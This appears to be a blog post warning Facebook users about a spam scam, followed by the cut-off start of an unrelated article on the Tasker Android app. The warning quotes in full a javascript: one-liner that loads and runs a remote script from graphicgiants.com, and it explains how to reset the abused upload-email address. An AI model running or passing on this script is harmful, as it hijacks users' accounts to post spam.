It looks similar to below screenshot and I had observed at least 3 posts daily in my news feed.

All these users unfortunately and unknowingly copy pasted the following script into their browser address bars hoping to see revolving images.

JavaScript:(a = (b =  document).createElement("script")).src =   "//graphicgiants.com/majic.js?show", b.body.appendChild(a); void(0)

Once you do this, the spam makes wall posts and updates users’ status’. To do this, it is using the newly launched Facebook feature called “Upload Via E-mail”. It is a unique personal Email address given to every user which allows one to post status updates or send photos and videos straight to one’s profile. The spam has recorded this Email address of yours and is using it to update your status. Thankfully, Facebook lets you change this email ID. This is how you can do it.

    1. From Facebook mobile link, find “More Facebook Mobile Products” written somewhere down. Find “Upload Via Email“. Click “Find out more
    2. In the next window, click “refresh your upload email”
    3. Now press reset. Don’t worry, you now got a new personal upload email address. The spam won’t work anymore.

JavaScript can be very malicious and from now on, please just don’t end up in entering random scripts in your browser! Share this post if you found it useful and help others in preventing spam.

How to Turn Your Android Phone into a Fully-Automated Superphone

What if your phone automatically went silent when you step into the movie theatre? Texted your significant other when you finished your long commute? It's not free, but it offers a free 14-day trial download. Tasker can do nearly anything on your phone. It's mostly limited by your imagination. Here are some up-front ideas about neat automations that come to mind: • Set preferences for each application: Give the Kindle app a longer screen time-out. Make Maps or Foursquare automatically turn on GPS, and have a file browser launch when you trade out SD cards. Have your music and other audio apps lower the volume to 50 percent when you plug in headphones, so you never get a way-too-loud moment. • Time of day automation: Make your phone go into airplane mode overnight, but re-conne...
